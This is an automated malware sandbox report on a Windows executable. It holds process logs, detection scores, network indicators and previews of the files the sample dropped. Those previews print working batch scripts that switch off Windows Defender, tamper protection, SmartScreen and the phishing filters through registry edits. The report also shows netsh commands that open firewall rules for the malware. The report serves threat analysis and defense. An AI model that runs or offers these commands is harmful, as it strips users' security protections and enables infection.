Source: netsh.exe, 00000001.00000003.1684836607.0000000000891000.00000004.00000020.00020000.00000000.sdmp, nggwslounqxvwf.exe, 00000005.00000002.1724753354.0000000001632000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\KYagm8gq5S.exeAPI call chain: ExitProcess graph end nodegraph_0-3536
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\Desktop\KYagm8gq5S.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name=nggwslounqxvwf dir=in action=allow program="C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe" enable=yes profile=public,privateJump to behavior
Source: C:\Users\user\Desktop\KYagm8gq5S.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name=nggwslounqxvwf dir=out action=allow program="C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe" enable=yes profile=public,privateJump to behavior
Source: C:\Users\user\Desktop\KYagm8gq5S.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\system32\explorer.exeJump to behavior
Source: PowerRun64.exe.0.drBinary or memory string: ASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KYagm8gq5S.exeCode function: 0_2_0040352F EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,CoUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352F
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Source: C:\Users\user\Desktop\KYagm8gq5S.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name=nggwslounqxvwf dir=in action=allow program="C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe" enable=yes profile=public,private
Source: C:\Users\user\Desktop\KYagm8gq5S.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name=nggwslounqxvwf dir=in action=allow program="C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe" enable=yes profile=public,private
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
1
Access Token Manipulation
1
Masquerading
OS Credential Dumping11
Security Software Discovery
Remote Services1
Clipboard Data
1
Ingress Tool Transfer
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts12
Process Injection
21
Disable or Modify Tools
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading
31
Virtualization/Sandbox Evasion
Security Account Manager31
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Access Token Manipulation
NTDS1
Application Window Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Process Injection
LSA Secrets2
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Obfuscated Files or Information
Cached Domain Credentials14
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Software Packing
DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Timestomp
Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
DLL Side-Loading
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
File Deletion
Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
KYagm8gq5S.exe42%ReversingLabsWin32.Adware.Nemesis
KYagm8gq5S.exe100%Joe Sandbox ML
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\BasicCalculator1.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\PowerRun64.exe21%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\SelfDel.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\SetACL64.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\WebView.exe4%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\dotNetFx40_Full_setup.exe3%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\dotNetFx45_Full_setup.exe3%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe3%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nsExec.dll0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://ppp84k45ss7ehy8ypic5x.limelightcdn.com0%Avira URL Cloudsafe
http://www.dantsteinfeld.clickd0%Avira URL Cloudsafe
https://helgeklein.com/setacl/documentation/command-line-version-setacl-exe0%Avira URL Cloudsafe
https://helgeklein.com0%Avira URL Cloudsafe
http://www.dantsteinfeld.clickC:0%Avira URL Cloudsafe
http://ppp84k45ss7ehy8ypic5x.limelightcdn.comd0%Avira URL Cloudsafe
http://www.dantsteinfeld.click/t0%Avira URL Cloudsafe
http://www.dantsteinfeld.click/0%Avira URL Cloudsafe
http://www.dantsteinfeld.click0%Avira URL Cloudsafe
https://helgeklein.com.0%Avira URL Cloudsafe
http://www.dantsteinfeld.clickT0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
ppp84k45ss7ehy8ypic5x.limelightcdn.com
23.106.59.18
truefalse
    unknown
    www.dantsteinfeld.click
    unknown
    unknownfalse
      unknown
      NameMaliciousAntivirus DetectionReputation
      http://www.dantsteinfeld.click/false
      • Avira URL Cloud: safe
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://ppp84k45ss7ehy8ypic5x.limelightcdn.comnggwslounqxvwf.exe, 00000005.00000002.1725274847.00000000036C0000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://www.dantsteinfeld.clickC:nggwslounqxvwf.exe, 00000005.00000002.1724753354.00000000015FE000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://helgeklein.comSetACL64.exe.0.drfalse
      • Avira URL Cloud: safe
      unknown
      http://www.dantsteinfeld.clickdnggwslounqxvwf.exe, 00000005.00000002.1725274847.00000000036C0000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://helgeklein.com/setacl/documentation/command-line-version-setacl-exeSetACL64.exe.0.drfalse
      • Avira URL Cloud: safe
      unknown
      http://www.dantsteinfeld.click/tnggwslounqxvwf.exe, 00000005.00000002.1725274847.000000000369E000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://nsis.sf.net/NSIS_ErrorErrorKYagm8gq5S.exefalse
        high
        https://google.comWebView.exe.0.drfalse
          high
          http://ppp84k45ss7ehy8ypic5x.limelightcdn.comdnggwslounqxvwf.exe, 00000005.00000002.1725274847.00000000036C0000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.dantsteinfeld.clicknggwslounqxvwf.exe, 00000005.00000002.1724753354.00000000015F0000.00000004.00000020.00020000.00000000.sdmp, nggwslounqxvwf.exe, 00000005.00000002.1725274847.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, nggwslounqxvwf.exe, 00000005.00000002.1724753354.00000000015FE000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namenggwslounqxvwf.exe, 00000005.00000002.1725274847.000000000369E000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            https://helgeklein.com.SetACL64.exe.0.drfalse
            • Avira URL Cloud: safe
            unknown
            http://www.dantsteinfeld.clickTnggwslounqxvwf.exe, 00000005.00000002.1725274847.0000000003641000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            23.106.59.18
            ppp84k45ss7ehy8ypic5x.limelightcdn.comUnited Kingdom
            205544LEASEWEB-UK-LON-11GBfalse
            Joe Sandbox version:41.0.0 Charoite
            Analysis ID:1581896
            Start date and time:2024-12-29 09:11:05 +01:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 3m 9s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:7
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:KYagm8gq5S.exe
            renamed because original name is a hash value
            Original Sample Name:59586c94ee121385d362a60382217b4e.exe
            Detection:MAL
            Classification:mal76.evad.winEXE@11/23@2/1
            EGA Information:
            • Successful, ratio: 50%
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 38
            • Number of non-executed functions: 30
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Stop behavior analysis, all processes terminated
            • Execution Graph export aborted for target nggwslounqxvwf.exe, PID 7424 because it is empty
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Report size getting too big, too many NtReadVirtualMemory calls found.
            TimeTypeDescription
            03:11:58API Interceptor26x Sleep call for process: nggwslounqxvwf.exe modified
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            23.106.59.18Order No 24.exeGet hashmaliciousFormBookBrowse
            • www.vehiculargustav.click/95c0/
            RFQ.exeGet hashmaliciousFormBookBrowse
            • www.vehiculargustav.click/95c0/
            statement of accounts.exeGet hashmaliciousFormBookBrowse
            • www.vehiculargustav.click/95c0/
            RFQ.exeGet hashmaliciousFormBookBrowse
            • www.vehiculargustav.click/95c0/
            XhAQ0Rk63O.exeGet hashmaliciousFormBookBrowse
            • www.vehiculargustav.click/95c0/
            SecuriteInfo.com.FileRepMalware.15071.2577.exeGet hashmaliciousUnknownBrowse
            • dotdo.net/chkn.php?n=4528372
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            ppp84k45ss7ehy8ypic5x.limelightcdn.comOrder No 24.exeGet hashmaliciousFormBookBrowse
            • 23.106.59.18
            RFQ.exeGet hashmaliciousFormBookBrowse
            • 23.106.59.18
            statement of accounts.exeGet hashmaliciousFormBookBrowse
            • 23.106.59.18
            RFQ.exeGet hashmaliciousFormBookBrowse
            • 23.106.59.18
            XhAQ0Rk63O.exeGet hashmaliciousFormBookBrowse
            • 23.106.59.18
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            LEASEWEB-UK-LON-11GBloligang.spc.elfGet hashmaliciousMiraiBrowse
            • 95.168.190.109
            mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
            • 95.168.183.180
            Order No 24.exeGet hashmaliciousFormBookBrowse
            • 23.106.59.18
            RFQ.exeGet hashmaliciousFormBookBrowse
            • 23.106.59.18
            statement of accounts.exeGet hashmaliciousFormBookBrowse
            • 23.106.59.18
            RFQ.exeGet hashmaliciousFormBookBrowse
            • 23.106.59.18
            XhAQ0Rk63O.exeGet hashmaliciousFormBookBrowse
            • 23.106.59.18
            SecuriteInfo.com.FileRepMalware.27261.32754.exeGet hashmaliciousUnknownBrowse
            • 23.106.59.52
            SecuriteInfo.com.ELF.Agent-AIN.28488.28782.elfGet hashmaliciousMiraiBrowse
            • 95.168.183.162
            SecuriteInfo.com.FileRepMalware.15071.2577.exeGet hashmaliciousUnknownBrowse
            • 23.106.59.18
            No context
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\PowerRun64.exeAuu2j0pT0B.exeGet hashmaliciousUnknownBrowse
              4hIPvzV6a2.exeGet hashmaliciousUnknownBrowse
                3Dut8dFCwD.exeGet hashmaliciousUnknownBrowse
                  Ms63nDrOBa.exeGet hashmaliciousUnknownBrowse
                    Ptmhbplhxb.exeGet hashmaliciousUnknownBrowse
                      P196hUN2fw.exeGet hashmaliciousUnknownBrowse
                        e4.exeGet hashmaliciousRedLineBrowse
                          2dOeahdsto.exeGet hashmaliciousXmrigBrowse
                            bQQHP9ciRL.exeGet hashmaliciousXmrigBrowse
                              DllHost.exeGet hashmaliciousXmrigBrowse
                                Process:C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe
                                File Type:CSV text
                                Category:dropped
                                Size (bytes):1058
                                Entropy (8bit):5.356262093008712
                                Encrypted:false
                                SSDEEP:24:ML9E4KlKDE4KhKiKhwE4Ty1KIE4oKNzKoZAE4KzeR:MxHKlYHKh3owH8tHo6hAHKzeR
                                MD5:B2EFBF032531DD2913F648E75696B0FD
                                SHA1:3F1AC93E4C10AE6D48E6CE1745D23696FD6554F6
                                SHA-256:4E02B680F9DAB8F04F2443984B5305541F73B52A612129FCD8CC0C520C831E4B
                                SHA-512:79430DB7C12536BDC06F21D130026A72F97BB03994CE2F718F82BB9ACDFFCA926F1292100B58B0C788BDDF739E87965B8D46C8F003CF5087F75BEFDC406295BC
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\bb5812ab3cec92427da8c5c696e5f731\System.Net.Http.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.X
                                Process:C:\Users\user\Desktop\KYagm8gq5S.exe
                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):205
                                Entropy (8bit):4.845887375192556
                                Encrypted:false
                                SSDEEP:6:hAjsH1dPfk7xzdfL21Yd3iiTKQlm/ZiF5c0IJOBeIv:uwDk47Qlmx6a05z
                                MD5:2C0CB84EE7D566EA0242DECBCAB08E6E
                                SHA1:36C47EA55677CA87D3CE278252F678724AF680B5
                                SHA-256:EB791EC4EF14A8D3F3EF80D6DF36EAD0FBCB415DF2A593C3E580293F1DF64C63
                                SHA-512:066D57A8E19DF0C53BCFB12BA63BD5FA7EA94851C149B131B6F23220AA6C477DCCC5F4B0FCDF77928C1ED5184C3677A480579010AD74AA7CEDF688A978A23F88
                                Malicious:false
                                Reputation:low
                                Preview:@echo off..cd %~dp0..set locationa=Windows ..set locationb=Defender..set location=%locationa%%locationb%..SetACL64 -on "HKLM\SOFTWARE\Microsoft\%location%" -ot reg -actn setowner -ownr "n:Administrators"..
                                Process:C:\Users\user\Desktop\KYagm8gq5S.exe
                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):858
                                Entropy (8bit):5.015634078898154
                                Encrypted:false
                                SSDEEP:24:yq7lGtinWlGTNlGqinWlGQNlGhinWlGaEhNlGaE4i8:b7lGtflGTNlGqflGQNlGhflGaEhNlGar
                                MD5:083164AAD1CE8289B60949ADFBC31AE9
                                SHA1:BF17A464C54C3A678EFC87952B2F42EA60AC7C27
                                SHA-256:AD095AF9CE6AE27B6C28B656DC3AE32C8DF8C6EB099958DA32A94FA3964DA640
                                SHA-512:C8581B1EB83CAC051B9C9502C21DEC59AE5DCEBFA00E6367D7110BEFA335D3EEC497022BF9180FEC16ED3D8C78762B23D0571E5D66EBC3F8893E7C4AE54CF27F
                                Malicious:false
                                Reputation:low
                                Preview:@echo off & title f & color 17..cd %~dp0..set location=Windows Defender..SetACL64 -on "HKLM\SOFTWARE\Microsoft\%location%" -ot reg -actn ace -ace "n:Administrators;p:full"..SetACL64 -on "HKLM\SOFTWARE\Microsoft\%location%\Features" -ot reg -actn setowner -ownr "n:Administrators"..SetACL64 -on "HKLM\SOFTWARE\Microsoft\%location%\Features" -ot reg -actn ace -ace "n:Administrators;p:full"..SetACL64 -on "HKLM\SOFTWARE\Microsoft\%location%\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"..SetACL64 -on "HKLM\SOFTWARE\Microsoft\%location%\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"..SetACL64 -on "HKLM\SOFTWARE\Microsoft\%location%\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"..SetACL64 -on "HKLM\SOFTWARE\Microsoft\%location%\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"..
                                Process:C:\Users\user\Desktop\KYagm8gq5S.exe
                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1119
                                Entropy (8bit):5.146642159934979
                                Encrypted:false
                                SSDEEP:24:LMnx+dxkLoxVGxaEW8d6YXYdOuPVBdEY9PVBxfWki9odV/fey:c+XkLgVmaEW8QyGfPVr9PpfWl92ley
                                MD5:65DA3B5ED9035081ACFB05832F1D9DBD
                                SHA1:2F07E41C6C0C96919E759C1EBD811113554261C9
                                SHA-256:C442CAE06755A3F8196501F099AA760E47204251BEAF189FD4BF816F87BBDD23
                                SHA-512:3D66AF2F61104D6F194B5C1152E11C72E07C967170457D51025BF34BF8B3E0D04259ADC92E93860487CC27A98ED9656498B41E8C04D3269E8876D4ECFFBDC0D0
                                Malicious:false
                                Preview:@echo off..cd %~dp0..set location=Windows Defender..set ltgt=DisableAntiVirus..reg add "HKLM\SOFTWARE\Microsoft\%location%" /v "%ltgt%" /t reg_DWORD /d "1" /f..reg add "HKLM\SOFTWARE\Microsoft\%location%\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f..reg add "HKLM\SOFTWARE\Microsoft\%location%\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f..reg add "HKLM\SOFTWARE\Microsoft\%location%\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f..reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f..reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f..reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f..reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f..reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg
                                Process:C:\Users\user\Desktop\KYagm8gq5S.exe
                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):415
                                Entropy (8bit):5.13999192389547
                                Encrypted:false
                                SSDEEP:12:VwaaK5q1ey4m8zL6sl0Rm8zL6u0Rm8zhu1Jl0X:yOq1z4dL6kodL6uod6y
                                MD5:5095897E2D18B891657D34A7E4C59147
                                SHA1:E069D4B9FFDD1E48D08D2E38D8D2E474A42D5682
                                SHA-256:FA1C60E30F24C409C22ABB8C0C0B2F349A7DF048D6F6808447C8285B64391358
                                SHA-512:380E82810864F41A33169FC19DC5EC3FB94909D4F0AB36B9C2A32AFC587999B13A561A1BFBB22D504CAA8E7665B89A7737BE8BA2C73085F379B7381770D32971
                                Malicious:false
                                Preview:@echo off & title f & color 17..cd %~dp0..set location=Windows Defender..set loyyy=PhishingFilter..reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\%loyyy%" /v "EnabledV9" /t reg_DWORD /d 0 /f..reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\%loyyy%" /v "PreventOverride" /t reg_DWORD /d 0 /f..reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\%loyyy%" /v "EnabledV9" /t reg_DWORD /d 0 /f..
                                Process:C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):2
                                Entropy (8bit):1.0
                                Encrypted:false
                                SSDEEP:3:V:V
                                MD5:444BCB3A3FCF8389296C49467F27E1D6
                                SHA1:7A85F4764BBD6DAF1C3545EFBBF0F279A6DC0BEB
                                SHA-256:2689367B205C16CE32ED4200942B8B8B1E262DFC70D9BC9FBC77C49699A4F1DF
                                SHA-512:9FBBBB5A0F329F9782E2356FA41D89CF9B3694327C1A934D6AF2A9DF2D7F936CE83717FB513196A4CE5548471708CD7134C2AE99B3C357BCABB2EAFC7B9B7570
                                Malicious:false
                                Preview:ok
                                Process:C:\Users\user\Desktop\KYagm8gq5S.exe
                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):628
                                Entropy (8bit):5.155311584565821
                                Encrypted:false
                                SSDEEP:12:VwpZ2m8sXEv0RonQEmhd49s8V7hd490RoAXhd49OoAuiWC290X:ypZ2oAoO449Zj49oP49OpG9y
                                MD5:DCFD4A862C3D75762927765955811793
                                SHA1:669B67AD983C7676F5846E137181F8CCBA9361C3
                                SHA-256:95E78DCAC65E6801078CD5E7EEC70AA7A0738732B80AFDFEA22D9DBA1CDE2144
                                SHA-512:131E4480E5FDA11ED918BA22568C8F69A1C0DDDD9D01A707E270FA9ED27283B0608E4865D1D7F13A36B76AC8600326B4FEC7FF1B3A912DF62F23EED7CDF7A610
                                Malicious:false
                                Preview:@echo off & title f & color 17..cd %~dp0..set location=Microsoft..reg add "HKLM\SOFTWARE\Policies\%location%\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f..reg add "HKLM\SOFTWARE\%location%\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f..reg add "HKCU\SOFTWARE\Policies\%location%\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f..reg add "HKLM\SOFTWARE\%location%\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f..reg add "HKLM\SOFTWARE\%location%\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f..
                                Process:C:\Users\user\Desktop\KYagm8gq5S.exe
                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):956
                                Entropy (8bit):5.04288440669859
                                Encrypted:false
                                SSDEEP:24:yQaxVdJnVQG9JnVdJnVMMQPfnpnVMHfnJnVMimvVgad4+C:RyTJnqG9JnTJnAHpnIJnxmvSwTC
                                MD5:7A53F49CC19B3CB657AAC4EC762482D0
                                SHA1:0C131C4FA261AAB93A66C74839EF992D958FCFE2
                                SHA-256:19508584771CE254AA45D4D8FAE1D3D4C91CCB77F35E059975C371C43B627E10
                                SHA-512:73DD7C9884908BA45115D1344288583DB0141A20BA6B5A68952E14A4FBE282029E6456CEE386B2223F50571EB001F5936F79EE05488055BA3084E5CDD3D94D7F
                                Malicious:false
                                Preview:@echo off & title f & color 17..cd %~dp0..set lofddfcaftiofgdfn=Windows Defender.. reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f.. reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f.. reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f.. reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f.. reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f.. reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f.. reg add "HKLM\SOFTWARE\Policies\Microsoft\%lofddfcaftiofgdfn%" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f..
                                Process:C:\Users\user\Desktop\KYagm8gq5S.exe
                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):434
                                Entropy (8bit):5.031892107507258
                                Encrypted:false
                                SSDEEP:6:hnIbwjsH1gCTBSiA7CPm/O8zzCFrmVoCTPm/O8zzCFC1EXiHVBVgTPm/O8zzCeQe:VwX4m8z0rm5am8z0COXePVgam8zQyL
